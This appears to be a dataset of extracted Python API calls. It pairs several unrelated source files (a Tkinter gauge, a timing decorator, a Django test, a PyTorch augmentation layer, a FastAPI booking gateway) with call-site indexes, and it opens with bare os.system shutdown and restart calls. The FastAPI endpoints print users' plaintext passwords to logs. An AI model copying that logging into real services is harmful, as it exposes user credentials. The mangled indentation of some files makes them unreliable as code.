[((99, 123), 'os.system', 'os.system', (['"""shutdown -s"""'], {}), "('shutdown -s')\n", (108, 123), False, 'import os\n'), ((358, 382), 'os.system', 'os.system', (['"""shutdown -r"""'], {}), "('shutdown -r')\n", (367, 382), False, 'import os\n'), ((169, 193), 'os.system', 'os.system', (['"""shutdown -h"""'], {}), "('shutdown -h')\n", (178, 193), False, 'import os\n'), ((428, 452), 'os.system', 'os.system', (['"""shutdown -r"""'], {}), "('shutdown -r')\n", (437, 452), False, 'import os\n')]
|
# -*- coding: utf-8 -*-
import Tkinter
import time
from random import randrange
class Mod_gauge(Tkinter.Canvas):
def __init__(self, parent, titre = "Gauge",background="#222735",foreground="#00d0c7", max = 127, min = 0):
global valeur, root, arc, text, H, W, coord1, coord2
        self.titre = titre
        self.max = max
        self.min = min
root = parent
valeur = 0.
H=290
W=260
coord1 = (H-240), (W-215), (H-80), (W-50)
coord2 = (H-270), (W-240), (H-50), (W-20)
Tkinter.Canvas.__init__(self, bg="#FF2E2E", height=H, width=W)
        # Draw the gauge
self.create_oval(coord1, fill="#FF2E2E", outline="#FF8B8B")
#self.create_oval(coord1, outline="#3399FF")
arc = self.create_arc(coord2, start=90, extent = valeur, fill="#FF8B8B",outline="#FF8B8B")
self.create_oval(coord2, outline="#FF8B8B")
text = self.create_text(130, 130, text=int(valeur), font="Arial 40 italic", fill="#FF8B8B")
legende = self.create_text(130, 260, text= self.titre, font="Arial 20 ", fill="#FF8B8B")
parent.update()
def SetValue(self, consigne):
global valeur, root, arc, text
parent = root
        consigne = (consigne * 100) / self.max
while (int(valeur) != int(consigne*3.6)):
if (int(valeur) < int(consigne*3.6)):
valeur = valeur + 1
txt_consigne = valeur/3.6
self.delete(arc)
self.delete(text)
arc = self.create_arc(coord2, start=90, extent=-valeur, fill="#FF8B8B")
self.create_oval(coord2, outline="#FF8B8B")
self.create_oval(coord1, fill="#FF2E2E", outline="#FF8B8B")
self.create_oval(coord1, outline="#FF8B8B")
text = self.create_text(130, 130, text=int(txt_consigne), font="Arial 40 italic", fill="#FF8B8B")
parent.update()
                #time.sleep(0.00002)  # Defines the gauge's inertia
elif( int(valeur) > int(consigne*3.6)):
valeur = valeur - 1
txt_consigne = valeur/3.6
self.delete(arc)
self.delete(text)
arc = self.create_arc(coord2, start=90, extent=-valeur, fill="#FF8B8B")
self.create_oval(coord2, outline="#FF8B8B")
self.create_oval(coord1, fill="#FF2E2E", outline="#FF8B8B")
self.create_oval(coord1, outline="#FF8B8B")
text = self.create_text(130, 130, text=int(txt_consigne), font="Arial 40 italic", fill="#FF8B8B")
parent.update()
                #time.sleep(0.00002)  # Defines the gauge's inertia
else :
txt_consigne = valeur/3.6
self.delete(arc)
self.delete(text)
arc = self.create_arc(coord2, start=90, extent=-valeur, fill="#FF8B8B")
self.create_oval(coord2, outline="#FF8B8B")
self.create_oval(coord1, fill="#FF2E2E", outline="#FF8B8B")
self.create_oval(coord1, outline="#FF8B8B")
text = self.create_text(130, 130, text=int(txt_consigne), font="Arial 40 italic", fill="#FF8B8B")
parent.update()
                #time.sleep(0.00002)  # Defines the gauge's inertia
def val():
for i in range(1,10):
gauge.SetValue(randrange(100))
if __name__=="__main__":
app=Tkinter.Tk()
gauge=Mod_gauge(app)
gauge.pack()
val()
app.mainloop()
|
[
"Tkinter.Canvas.__init__",
"random.randrange",
"Tkinter.Tk"
] |
[((3430, 3442), 'Tkinter.Tk', 'Tkinter.Tk', ([], {}), '()\n', (3440, 3442), False, 'import Tkinter\n'), ((493, 555), 'Tkinter.Canvas.__init__', 'Tkinter.Canvas.__init__', (['self'], {'bg': '"""#FF2E2E"""', 'height': 'H', 'width': 'W'}), "(self, bg='#FF2E2E', height=H, width=W)\n", (516, 555), False, 'import Tkinter\n'), ((3380, 3394), 'random.randrange', 'randrange', (['(100)'], {}), '(100)\n', (3389, 3394), False, 'from random import randrange\n')]
|
import time
from decimal import Decimal, getcontext
from functools import wraps
'''
Ways to count execution time:
- time of whole program: $time python3.8 slow_program.py
- too many info: $python3.8 -m cProfile -s time slow_program.py
- direct time measure with Timing Specific Function(via decorator):
'''
def timeit_wrapper(func):
    @wraps(func)  # preserve the wrapped function's name and docstring
def wrapper(*args, **kwargs):
start = time.perf_counter() # Alternatively, you can use time.process_time()
func_return_val = func(*args, **kwargs)
end = time.perf_counter()
print('{0:<10}.{1:<8} : {2:<8}'.format(
func.__module__, func.__name__, end - start))
return func_return_val
return wrapper
# slow_program.py ------------------------------------------------------------------
@timeit_wrapper
def exp(x):
getcontext().prec += 2
i, lasts, s, fact, num = 0, 0, 1, 1, 1
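    # Taylor series of e**x: keep adding num/fact terms until the sum stops changing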
while s != lasts:
lasts = s
i += 1
fact *= i
num *= x
s += num / fact
getcontext().prec -= 2
return +s
print('{0:<10} {1:<8} {2:^8}'.format('module', 'function', 'time'))
exp(Decimal(150))
exp(Decimal(400))
exp(Decimal(3000))
|
[
"decimal.getcontext",
"time.perf_counter",
"decimal.Decimal"
] |
[((1125, 1137), 'decimal.Decimal', 'Decimal', (['(150)'], {}), '(150)\n', (1132, 1137), False, 'from decimal import Decimal, getcontext\n'), ((1143, 1155), 'decimal.Decimal', 'Decimal', (['(400)'], {}), '(400)\n', (1150, 1155), False, 'from decimal import Decimal, getcontext\n'), ((1161, 1174), 'decimal.Decimal', 'Decimal', (['(3000)'], {}), '(3000)\n', (1168, 1174), False, 'from decimal import Decimal, getcontext\n'), ((403, 422), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (420, 422), False, 'import time\n'), ((535, 554), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (552, 554), False, 'import time\n'), ((831, 843), 'decimal.getcontext', 'getcontext', ([], {}), '()\n', (841, 843), False, 'from decimal import Decimal, getcontext\n'), ((1015, 1027), 'decimal.getcontext', 'getcontext', ([], {}), '()\n', (1025, 1027), False, 'from decimal import Decimal, getcontext\n')]
|
from books.models import *
from freezegun import freeze_time
from django.test import TransactionTestCase
from django.test import TestCase
from django.db import DatabaseError, transaction
from books.controllers.customer import Order as SaleOrder
from books.controllers import accountant as acc
from books.controllers import sale
from books.seeders import sales_order as so
import moment
import json
import unittest
import random
import datetime
import logging
logger = logging.getLogger(__name__)
class InventoryTestCase(TestCase):
def setUp(self):
self.trxNo = acc.getTrxNo("INV")
def test_so(self):
total_price = 0
total_cost = 0
try:
with transaction.atomic():
salesOrder = SaleOrder()
for x in range(2):
units = random.randint(1,10)
cat = so.getCatalogue(created_at=datetime.datetime.now())
stock = so.getStock(cat=cat, trxNo=self.trxNo, created_at=datetime.datetime.now())
salesOrder.addItem(cat=cat, units=units)
total_cost += units * stock.unit_cost
total_price += units * stock.cat.price
self.assertEqual(total_price, salesOrder.getTotalPrice())
self.assertTrue(salesOrder.saveWithTrxNo(self.trxNo))
self.assertEqual(total_cost, salesOrder.getTotalCost())
trx = sale.invoice(order=salesOrder, descr="Stationery")
self.assertTrue(sale.receipt(trxNo=self.trxNo, amt=salesOrder.getTotalPrice()))
except DatabaseError as e:
logger.error(e)
except Exception as e:
logger.error(e)
def tearDown(self):
pass
|
[
"books.controllers.accountant.getTrxNo",
"books.controllers.customer.Order",
"random.randint",
"datetime.datetime.now",
"books.controllers.sale.invoice",
"django.db.transaction.atomic",
"logging.getLogger"
] |
[((472, 499), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (489, 499), False, 'import logging\n'), ((569, 588), 'books.controllers.accountant.getTrxNo', 'acc.getTrxNo', (['"""INV"""'], {}), "('INV')\n", (581, 588), True, 'from books.controllers import accountant as acc\n'), ((661, 681), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (679, 681), False, 'from django.db import DatabaseError, transaction\n'), ((700, 711), 'books.controllers.customer.Order', 'SaleOrder', ([], {}), '()\n', (709, 711), True, 'from books.controllers.customer import Order as SaleOrder\n'), ((1247, 1297), 'books.controllers.sale.invoice', 'sale.invoice', ([], {'order': 'salesOrder', 'descr': '"""Stationery"""'}), "(order=salesOrder, descr='Stationery')\n", (1259, 1297), False, 'from books.controllers import sale\n'), ((748, 769), 'random.randint', 'random.randint', (['(1)', '(10)'], {}), '(1, 10)\n', (762, 769), False, 'import random\n'), ((807, 830), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (828, 830), False, 'import datetime\n'), ((895, 918), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (916, 918), False, 'import datetime\n')]
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from .function import onehot, onehot_cross
class random_batch_generalization_abs(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y, rate, epsilon):
batch_size = x.shape[0]
ref_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
target_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
mag = torch.empty(len(ref_index)).normal_(mean=0.0, std=epsilon)
mag = mag.abs()
ctx.save_for_backward(x, ref_index, target_index, mag)
ret = x.clone()
ret_y = y.clone()
for i in range(len(ref_index)):
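            # blend the target sample into the reference sample, weighted by mag[i]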
ret[ref_index[i]] = (x[target_index[i]] * mag[i]
+ x[ref_index[i]] * (1 - mag[i]))
total = (mag[i].abs() + (1 - mag[i]).abs())
target_p = mag[i].abs() / total
ref_p = (1 - mag[i]).abs() / total
ret_y[target_index[i]] += y[ref_index[i]] * target_p
ret_y[ref_index[i]] = y[ref_index[i]] * ref_p
return ret, ret_y
@staticmethod
def backward(ctx, grad_output, _):
x, ref_index, target_index, mag = ctx.saved_tensors
grad_input = grad_output.clone()
for i in range(len(ref_index)):
ref = grad_input[ref_index[i]]
# dL/da = dL/dy * dy/da
grad_input[ref_index[i]] = ref * (1 - mag[i])
# dL/db = dL/dy * dy/db
grad_input[target_index[i]] += ref * mag[i]
return grad_input, None, None, None
class random_batch_generalization(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y, rate, epsilon):
batch_size = x.shape[0]
ref_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
target_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
mag = torch.empty(len(ref_index)).normal_(mean=0.0, std=epsilon)
ctx.save_for_backward(x, ref_index, target_index, mag)
ret = x.clone()
ret_y = y.clone()
for i in range(len(ref_index)):
ret[ref_index[i]] = (x[target_index[i]] * mag[i]
+ x[ref_index[i]] * (1 - mag[i]))
total = (mag[i].abs() + (1 - mag[i]).abs())
target_p = mag[i].abs() / total
ref_p = (1 - mag[i]).abs() / total
ret_y[target_index[i]] += y[ref_index[i]] * target_p
ret_y[ref_index[i]] = y[ref_index[i]] * ref_p
return ret, ret_y
@staticmethod
def backward(ctx, grad_output, _):
x, ref_index, target_index, mag = ctx.saved_tensors
grad_input = grad_output.clone()
for i in range(len(ref_index)):
ref = grad_input[ref_index[i]]
# dL/da = dL/dy * dy/da
grad_input[ref_index[i]] = ref * (1 - mag[i])
# dL/db = dL/dy * dy/db
grad_input[target_index[i]] += ref * mag[i]
return grad_input, None, None, None
class RandomBatchGeneralization(nn.Module):
def __init__(self, rate=0.1, epsilon=0.4, abs_mag=False):
super().__init__()
self.epsilon = epsilon
self.rate = rate
        if abs_mag:
            self.forward_ = random_batch_generalization_abs.apply
        else:
            self.forward_ = random_batch_generalization.apply
def forward(self, x, y):
if self.training:
return self.forward_(x, y, self.rate, self.epsilon)
else:
return x, y
class batch_generalization(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y, rate, epsilon):
batch_size = x.shape[0]
ref_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
target_index = torch.zeros(ref_index.shape, dtype=torch.int)
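        # for every chosen sample, pick a mixing partner that shares its label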
for i in range(len(ref_index)):
same_label = torch.where(y == y[ref_index[i]])[0]
j = torch.randint(low=0, high=len(same_label), size=(1,))
target_index[i] = same_label[j[0]]
mag = torch.empty(len(ref_index)).normal_(mean=0.0, std=epsilon)
ret = x.clone()
for i in range(len(ref_index)):
ret[ref_index[i]] = (x[target_index[i]] * mag[i]
+ x[ref_index[i]] * (1 - mag[i]))
# ctx.save_for_backward(x, ref_index, target_index, mag)
ctx.save_for_backward(ref_index, target_index, mag)
return ret
@staticmethod
def backward(ctx, grad_output):
# x, ref_index, target_index, mag = ctx.saved_tensors
ref_index, target_index, mag = ctx.saved_tensors
grad_input = grad_output.clone()
for i in range(len(ref_index)):
ref = grad_input[ref_index[i]]
# dL/da = dL/dy * dy/da
grad_input[ref_index[i]] = ref * (1 - mag[i])
# dL/db = dL/dy * dy/db
grad_input[target_index[i]] += ref * mag[i]
return grad_input, None, None, None
class BatchGeneralization(nn.Module):
def __init__(self, rate=0.1, epsilon=0.4):
super().__init__()
self.epsilon = epsilon
self.rate = rate
self.forward_ = batch_generalization.apply
def forward(self, x, y):
if self.training:
return self.forward_(x, y, self.rate, self.epsilon)
else:
return x
class GeneralizationDoNothing(nn.Module):
def __init__(self, rate=0.1, epsilon=0.4):
super().__init__()
def forward(self, x, y):
return x
if __name__ == '__main__':
import time
def profile(func, x, y):
start = time.perf_counter()
ret = func(x, y)
end = time.perf_counter()
print("{}, {} ms".format(str(func), (end - start) * 1000))
return ret
x = torch.rand((100, 3, 256, 256), requires_grad=True)
y = torch.randint(low=0, high=9, size=(100,))
r = RandomBatchGeneralization(rate=0.5)
ret_x, ret_y = profile(r, x, onehot(y, 10))
ret_x.sum().backward()
print(ret_y[:10])
print(ret_y.shape)
# profile(r.cuda(), x.cuda())
r = BatchGeneralization()
ret = profile(r, x, y)
ret.sum().backward()
output = torch.rand((100, 10), requires_grad=True)
loss = onehot_cross(output, onehot(y, 10))
print(loss)
loss.backward()
loss = torch.nn.functional.cross_entropy(output, y)
print(loss)
loss = onehot_cross(output, ret_y)
print(loss)
|
[
"torch.randint",
"torch.where",
"time.perf_counter",
"torch.nn.functional.cross_entropy",
"torch.rand",
"torch.zeros"
] |
[((6041, 6091), 'torch.rand', 'torch.rand', (['(100, 3, 256, 256)'], {'requires_grad': '(True)'}), '((100, 3, 256, 256), requires_grad=True)\n', (6051, 6091), False, 'import torch\n'), ((6100, 6141), 'torch.randint', 'torch.randint', ([], {'low': '(0)', 'high': '(9)', 'size': '(100,)'}), '(low=0, high=9, size=(100,))\n', (6113, 6141), False, 'import torch\n'), ((6438, 6479), 'torch.rand', 'torch.rand', (['(100, 10)'], {'requires_grad': '(True)'}), '((100, 10), requires_grad=True)\n', (6448, 6479), False, 'import torch\n'), ((6574, 6618), 'torch.nn.functional.cross_entropy', 'torch.nn.functional.cross_entropy', (['output', 'y'], {}), '(output, y)\n', (6607, 6618), False, 'import torch\n'), ((4033, 4078), 'torch.zeros', 'torch.zeros', (['ref_index.shape'], {'dtype': 'torch.int'}), '(ref_index.shape, dtype=torch.int)\n', (4044, 4078), False, 'import torch\n'), ((5867, 5886), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (5884, 5886), False, 'import time\n'), ((5926, 5945), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (5943, 5945), False, 'import time\n'), ((4144, 4177), 'torch.where', 'torch.where', (['(y == y[ref_index[i]])'], {}), '(y == y[ref_index[i]])\n', (4155, 4177), False, 'import torch\n')]
|
import asyncio
import sys
import time
import datetime
from queue import Queue
from threading import Thread
from typing import Optional
from fastapi import FastAPI, Form, HTTPException, Request
from fastapi.middleware.cors import CORSMiddleware
from sse_starlette.sse import EventSourceResponse
from google.protobuf import json_format
from hipotap_common.api.endpoints import (
GET_ORDER_PATH,
GET_TRENDS_PATH,
ORDER_PAYMENT_PATH,
ORDER_RESERVE_REQUEST_PATH,
ORDER_LIST_PATH,
ORDER_LISTEN_PATH,
OFFER_PATH,
OFFER_FILTERING_PATH,
OFFER_LISTEN_PATH
)
from hipotap_common.proto_messages.auth_pb2 import AuthStatus
from hipotap_common.proto_messages.customer_pb2 import CustomerCredentialsPB, CustomerPB
from hipotap_common.proto_messages.hipotap_pb2 import BaseStatus
from hipotap_common.proto_messages.order_pb2 import (
GetOrderRequestPB,
OrderPB,
OrderPaymentRequestPB,
OrderRequestPB,
OrderListRequestPB,
)
from hipotap_common.proto_messages.offer_pb2 import (
OfferFilterPB
)
from pydantic import BaseModel
from hipotap_common.rpc.clients.customer_rpc_client import CustomerRpcClient
from hipotap_common.rpc.clients.offer_rpc_client import OfferRpcClient
from hipotap_common.rpc.clients.order_rpc_client import OrderRpcClient
from hipotap_common.rpc.clients.events_fanout_client import EventFanoutClient
CUSTOMER_AUTH_QUEUE = "customer_auth"
class AuthData(BaseModel):
email: str
password: str
app = FastAPI()
origins = [
"http://localhost:17212",
"http://localhost:17213",
]
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
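# startup delay, presumably giving the message broker time to come up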
time.sleep(5)
@app.post("/customer/authenticate/")
async def authenticate(email: str = Form(...), password: str = Form(...)):
print(f"Got [POST]/customer/authenticate/ with email={email}&password={password}")
sys.stdout.flush()
customer_credentials = CustomerCredentialsPB()
customer_credentials.email = email
customer_credentials.password = password
customer_client = CustomerRpcClient()
auth_response_pb = customer_client.authenticate(customer_credentials)
if auth_response_pb.status == AuthStatus.OK:
print("Authentication OK")
sys.stdout.flush()
return {
"name": auth_response_pb.customer_data.name,
"surname": auth_response_pb.customer_data.surname,
}
else:
raise HTTPException(status_code=401, detail="Invalid credentials")
@app.post("/customer/register/")
async def register(
name: str = Form(...),
surname: str = Form(...),
email: str = Form(...),
password: str = Form(...),
):
print(
f"Got [POST]/customer/register/ with name={name}, surname={surname}, email={email}, password={password}"
)
sys.stdout.flush()
customer_client = CustomerRpcClient()
customer_pb = CustomerPB()
customer_pb.data.name = name
customer_pb.data.surname = surname
customer_pb.credentials.email = email
customer_pb.credentials.password = password
reg_response = customer_client.register(customer_pb)
if reg_response.status == BaseStatus.OK:
print("Registration OK")
sys.stdout.flush()
return {"status": "OK"}
else:
raise HTTPException(status_code=401, detail="Email is taken")
@app.get("/offers/")
async def offers():
print(f"Got [GET]/offers/", flush=True)
offer_client = OfferRpcClient()
offer_list_pb = offer_client.get_offers()
return json_format.MessageToDict(
offer_list_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.get(OFFER_PATH + "{offer_id}")
async def offer(offer_id: int):
print(f"Got [GET]/offer/{offer_id}", flush=True)
offer_client = OfferRpcClient()
offer_pb = offer_client.get_offer(offer_id)
return json_format.MessageToDict(
offer_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.get(OFFER_FILTERING_PATH)
async def offers_filtered(
allowed_adult_count: Optional[int] = Form(None),
allowed_children_count: Optional[int] = Form(None),
max_adult_price: Optional[float] = Form(None),
max_children_price: Optional[float] = Form(None),
hotel: Optional[str] = Form(None),
place: Optional[str] = Form(None),
date_start: Optional[str] = Form(None),
date_end: Optional[str] = Form(None)
):
print(f"Got [GET]/offer/filter/ with "
f"allowed_adult_count={allowed_adult_count}, "
f"allowed_children_count={allowed_children_count}, "
f"max_adult_price={max_adult_price}, "
f"max_children_price = {max_children_price}, "
f"hotel={hotel}, "
f"place={place}, "
f"date_start={date_start}, "
f"date_end={date_end}", flush=True)
offer_client = OfferRpcClient()
offer_filter_pb = OfferFilterPB()
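    # each use_* flag tells the backend which optional filter fields were actually supplied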
offer_filter_pb.use_allowed_adult_count = allowed_adult_count is not None
offer_filter_pb.use_allowed_children_count = allowed_children_count is not None
offer_filter_pb.use_max_adult_price = max_adult_price is not None
offer_filter_pb.use_max_children_price = max_children_price is not None
offer_filter_pb.use_place = place is not None
offer_filter_pb.use_hotel = hotel is not None
offer_filter_pb.use_date_start = date_start is not None
offer_filter_pb.use_date_end = date_end is not None
if offer_filter_pb.use_allowed_adult_count:
offer_filter_pb.allowed_adult_count = allowed_adult_count
if offer_filter_pb.use_allowed_children_count:
offer_filter_pb.allowed_children_count = allowed_children_count
if offer_filter_pb.use_max_adult_price:
offer_filter_pb.max_adult_price = max_adult_price
if offer_filter_pb.use_max_children_price:
offer_filter_pb.max_children_price = max_children_price
if offer_filter_pb.use_place:
offer_filter_pb.place = place
if offer_filter_pb.use_hotel:
offer_filter_pb.hotel = hotel
if offer_filter_pb.use_date_start:
offer_filter_pb.date_start.FromDatetime(datetime.datetime.strptime(date_start, "%Y-%m-%d"))
if offer_filter_pb.use_date_end:
offer_filter_pb.date_end.FromDatetime(datetime.datetime.strptime(date_end, "%Y-%m-%d"))
offer_list_pb = offer_client.get_offers_filtered(offer_filter_pb)
return json_format.MessageToDict(
offer_list_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.post(ORDER_RESERVE_REQUEST_PATH)
async def order_reserve_request(
offer_id: int = Form(...),
customer_email: str = Form(...),
adult_count: int = Form(...),
children_count: int = Form(...),
):
order_client = OrderRpcClient()
order_request_pb = OrderRequestPB()
order_request_pb.offer_id = offer_id
order_request_pb.customer_email = customer_email
order_request_pb.adult_count = adult_count
order_request_pb.children_count = children_count
order_response = order_client.order_reserve_request(order_request_pb)
if order_response.status == BaseStatus.OK:
print("Order OK", flush=True)
order_pb = OrderPB()
order_response.message.Unpack(order_pb)
return json_format.MessageToDict(
order_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
else:
raise HTTPException(status_code=401, detail="Cannot order offer")
@app.get(ORDER_LIST_PATH)
async def order_list_request(customer_email: str = Form(...)):
order_client = OrderRpcClient()
order_list_request_pb = OrderListRequestPB()
order_list_request_pb.customer_email = customer_email
order_list_pb = order_client.get_order_list(order_list_request_pb)
return json_format.MessageToDict(
order_list_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.get(GET_ORDER_PATH)
async def get_order_request(order_id: int = Form(...)):
order_client = OrderRpcClient()
get_order_request_PB = GetOrderRequestPB()
get_order_request_PB.order_id = order_id
order_pb = order_client.get_order(get_order_request_PB)
return json_format.MessageToDict(
order_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.post(ORDER_PAYMENT_PATH)
async def order_payment_request(
order_id: int = Form(...),
card_number: str = Form(...),
price: float = Form(...),
):
order_client = OrderRpcClient()
order_paymet_request_pb = OrderPaymentRequestPB()
order_paymet_request_pb.order_id = order_id
order_paymet_request_pb.payment_info.card_number = card_number
order_paymet_request_pb.payment_info.price = price
payment_response = order_client.order_payment_request(order_paymet_request_pb)
if payment_response.status == BaseStatus.OK:
print("Payment OK", flush=True)
return {"status": "OK"}
else:
raise HTTPException(status_code=401, detail="Cannot pay order")
MESSAGE_STREAM_RETRY_TIMEOUT = 15000  # milliseconds - change also in events_fanout_client (bad code)
MESSAGE_STREAM_DELAY = 1 # second (or maybe this one should be in events_fanout_client) (very bad code)
def event_receiving(event_queue: Queue, event_type):
print("THREAD START", flush=True)
event_fanout_client = EventFanoutClient(event_queue, event_type)
event_fanout_client.start_consuming()
print("THREAD EXIT", flush=True)
@app.get(OFFER_LISTEN_PATH + "{offer_id}")
async def get_offer_events(offer_id: int, request: Request):
#event_client = EventRpcClient()
#new_offer_PB =
print(f"GOT /offer/listen/{offer_id}")
async def event_generator(request: Request):
event_queue = Queue()
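        # a background thread consumes broker events and feeds them into this queue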
event_receiver_thread = Thread(target=event_receiving, args=(event_queue, "offer", ))
print("THREAD CREATED", flush=True)
event_receiver_thread.start()
try:
while True:
if await request.is_disconnected():
break
while not event_queue.empty():
# todo: process message
print("EVENT", flush=True)
yield {
"event": "message",
"id": "message_id",
"retry": MESSAGE_STREAM_RETRY_TIMEOUT,
"data": event_queue.get()
}
                else:
                    print("No events in the queue", flush=True)
                    await asyncio.sleep(MESSAGE_STREAM_DELAY)
        except asyncio.CancelledError:
            print(f"Disconnected client - {request.client}", flush=True)
        finally:
            print("Closing event stream", flush=True)
return EventSourceResponse(event_generator(request))
@app.get(ORDER_LISTEN_PATH + "{order_id}")
async def get_order_events(order_id: int, request: Request):
#event_client = EventRpcClient()
#new_offer_PB =
print(f"GOT /order/listen/{order_id}")
async def event_generator(request: Request):
event_queue = Queue()
event_receiver_thread = Thread(target=event_receiving, args=(event_queue, "order", ))
print("THREAD CREATED", flush=True)
event_receiver_thread.start()
try:
while True:
if await request.is_disconnected():
break
while not event_queue.empty():
# todo: process message
print("EVENT", flush=True)
yield {
"event": "message",
"id": "message_id",
"retry": MESSAGE_STREAM_RETRY_TIMEOUT,
"data": event_queue.get()
}
                else:
                    print("No events in the queue", flush=True)
                    await asyncio.sleep(MESSAGE_STREAM_DELAY)
        except asyncio.CancelledError:
            print(f"Disconnected client - {request.client}", flush=True)
        finally:
            print("Closing event stream", flush=True)
return EventSourceResponse(event_generator(request))
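# A minimal SSE client sketch for the listen endpoints above, using only the
# standard library (the URL is illustrative and assumes ORDER_LISTEN_PATH
# resolves to something like /order/listen/):
#
#   import urllib.request
#   with urllib.request.urlopen("http://localhost:8000/order/listen/1") as resp:
#       for raw_line in resp:
#           line = raw_line.decode("utf-8").strip()
#           if line.startswith("data:"):
#               print(line[len("data:"):].strip())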
@app.get(GET_TRENDS_PATH)
async def get_trends_request():
orders_client = OrderRpcClient()
trends_pb = orders_client.get_trends_request()
return json_format.MessageToDict(
trends_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
|
[
"hipotap_common.rpc.clients.offer_rpc_client.OfferRpcClient",
"sys.stdout.flush",
"google.protobuf.json_format.MessageToDict",
"hipotap_common.proto_messages.order_pb2.OrderPaymentRequestPB",
"hipotap_common.proto_messages.offer_pb2.OfferFilterPB",
"hipotap_common.proto_messages.order_pb2.OrderRequestPB",
"hipotap_common.proto_messages.order_pb2.OrderPB",
"hipotap_common.rpc.clients.customer_rpc_client.CustomerRpcClient",
"hipotap_common.rpc.clients.order_rpc_client.OrderRpcClient",
"fastapi.FastAPI",
"threading.Thread",
"hipotap_common.proto_messages.customer_pb2.CustomerCredentialsPB",
"asyncio.sleep",
"fastapi.Form",
"time.sleep",
"datetime.datetime.strptime",
"queue.Queue",
"hipotap_common.proto_messages.order_pb2.GetOrderRequestPB",
"fastapi.HTTPException",
"hipotap_common.rpc.clients.events_fanout_client.EventFanoutClient",
"hipotap_common.proto_messages.customer_pb2.CustomerPB",
"hipotap_common.proto_messages.order_pb2.OrderListRequestPB"
] |
[((1476, 1485), 'fastapi.FastAPI', 'FastAPI', ([], {}), '()\n', (1483, 1485), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((1710, 1723), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (1720, 1723), False, 'import time\n'), ((1799, 1808), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (1803, 1808), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((1826, 1835), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (1830, 1835), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((1929, 1947), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1945, 1947), False, 'import sys\n'), ((1976, 1999), 'hipotap_common.proto_messages.customer_pb2.CustomerCredentialsPB', 'CustomerCredentialsPB', ([], {}), '()\n', (1997, 1999), False, 'from hipotap_common.proto_messages.customer_pb2 import CustomerCredentialsPB, CustomerPB\n'), ((2107, 2126), 'hipotap_common.rpc.clients.customer_rpc_client.CustomerRpcClient', 'CustomerRpcClient', ([], {}), '()\n', (2124, 2126), False, 'from hipotap_common.rpc.clients.customer_rpc_client import CustomerRpcClient\n'), ((2616, 2625), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (2620, 2625), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((2646, 2655), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (2650, 2655), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((2674, 2683), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (2678, 2683), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((2705, 2714), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (2709, 2714), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((2853, 2871), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (2869, 2871), False, 'import sys\n'), ((2895, 2914), 'hipotap_common.rpc.clients.customer_rpc_client.CustomerRpcClient', 'CustomerRpcClient', ([], {}), '()\n', (2912, 2914), False, 'from hipotap_common.rpc.clients.customer_rpc_client import CustomerRpcClient\n'), ((2933, 2945), 'hipotap_common.proto_messages.customer_pb2.CustomerPB', 'CustomerPB', ([], {}), '()\n', (2943, 2945), False, 'from hipotap_common.proto_messages.customer_pb2 import CustomerCredentialsPB, CustomerPB\n'), ((3490, 3506), 'hipotap_common.rpc.clients.offer_rpc_client.OfferRpcClient', 'OfferRpcClient', ([], {}), '()\n', (3504, 3506), False, 'from hipotap_common.rpc.clients.offer_rpc_client import OfferRpcClient\n'), ((3565, 3680), 'google.protobuf.json_format.MessageToDict', 'json_format.MessageToDict', (['offer_list_pb'], {'preserving_proto_field_name': '(True)', 'including_default_value_fields': '(True)'}), '(offer_list_pb, preserving_proto_field_name=True,\n including_default_value_fields=True)\n', (3590, 3680), False, 'from google.protobuf import json_format\n'), ((3852, 3868), 'hipotap_common.rpc.clients.offer_rpc_client.OfferRpcClient', 'OfferRpcClient', ([], {}), '()\n', (3866, 3868), False, 'from hipotap_common.rpc.clients.offer_rpc_client import OfferRpcClient\n'), ((3929, 4039), 'google.protobuf.json_format.MessageToDict', 'json_format.MessageToDict', (['offer_pb'], {'preserving_proto_field_name': '(True)', 'including_default_value_fields': '(True)'}), '(offer_pb, preserving_proto_field_name=True,\n including_default_value_fields=True)\n', (3954, 4039), False, 'from google.protobuf import json_format\n'), ((4168, 4178), 'fastapi.Form', 'Form', (['None'], {}), '(None)\n', (4172, 4178), False, 'from 